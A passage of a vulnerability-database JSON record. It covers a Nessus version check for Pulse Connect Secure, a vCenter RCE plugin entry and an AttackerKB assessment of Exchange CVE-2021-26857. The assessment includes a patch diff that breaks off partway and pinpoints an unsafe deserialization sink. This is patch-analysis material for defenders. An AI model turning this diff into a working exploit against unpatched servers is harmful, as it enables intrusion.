script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\n# from https://www-prev.pulsesecure.net/techpubs/pulse-connect-secure/pcs/9.1rx/\n# 9.1R11.3 is 9.1.11.12173\n# 9.1R11.4 is 9.1.11.12319\nconstraints = [\n {'min_version':'9.0.3', 'max_version':'9.1.11.12173', 'fixed_display':'9.1R11.4 (9.1.11.12319)'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:01:15", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U2b, 6.7 before 6.7 U3n, and 6.5 before 6.5 U3p) and VMware Cloud Foundation (4.x before 4.2.1 and 3.x before 3.10.2.1).", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "VMware vCenter Server Virtual SAN Health Check plug-in RCE (CVE-2021-21985) (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21985"], "modified": "2021-07-13T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21985.NBIN", "href": "https://www.tenable.com/plugins/nessus/150163", "sourceData": "Binary data vmware_vcenter_cve-2021-21985.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-08-02T17:26:44", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 03, 2021 6:59pm UTC reported:\n\nAs per [Microsoft\u2019s blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server\u2019s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.\n\nI took a look at CVE-2021-26857 last night and came up with the following patch diff:\n \n \n --- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:54:18.000000000 -0600\n +++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:55:19.000000000 -0600\n @@ -1,742 +1,886 @@\n \ufeffusing System;\n +using System.Collections.Generic;\n using System.Globalization;\n using System.IO;\n +using System.Runtime.Serialization;\n +using Microsoft.Exchange.Compliance.Serialization.Formatters;\n +using Microsoft.Exchange.Data;\n +using Microsoft.Exchange.Data.Common;\n using Microsoft.Exchange.Data.Directory;\n using Microsoft.Exchange.Data.Directory.Recipient;\n using Microsoft.Exchange.Data.Directory.SystemConfiguration;\n using Microsoft.Exchange.Data.Storage;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;\n using Microsoft.Exchange.ExchangeSystem;\n using Microsoft.Exchange.TextProcessing.Boomerang;\n using Microsoft.Exchange.UM.UMCommon;\n +using Microsoft.Mapi;\n \n namespace Microsoft.Exchange.UM.UMCore\n {\n \tinternal abstract class PipelineContext : DisposableBase, IUMCreateMessage\n \t{\n \t\tinternal PipelineContext()\n \t\t{\n \t\t}\n \n \t\tinternal PipelineContext(SubmissionHelper helper)\n \t\t{\n \t\t\tbool flag = false;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tthis.helper = helper;\n \t\t\t\tthis.cultureInfo = new CultureInfo(helper.CultureInfo);\n \t\t\t\tflag = true;\n \t\t\t}\n \t\t\tfinally\n \t\t\t{\n \t\t\t\tif (!flag)\n \t\t\t\t{\n \t\t\t\t\tthis.Dispose();\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tpublic MessageItem MessageToSubmit\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageToSubmit;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic string MessageID\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageID;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageID = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal abstract Pipeline Pipeline { get; }\n \n \t\tinternal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerId;\n \t\t\t}\n \t\t}\n \n \t\tinternal Guid TenantGuid\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n \t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n \t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n 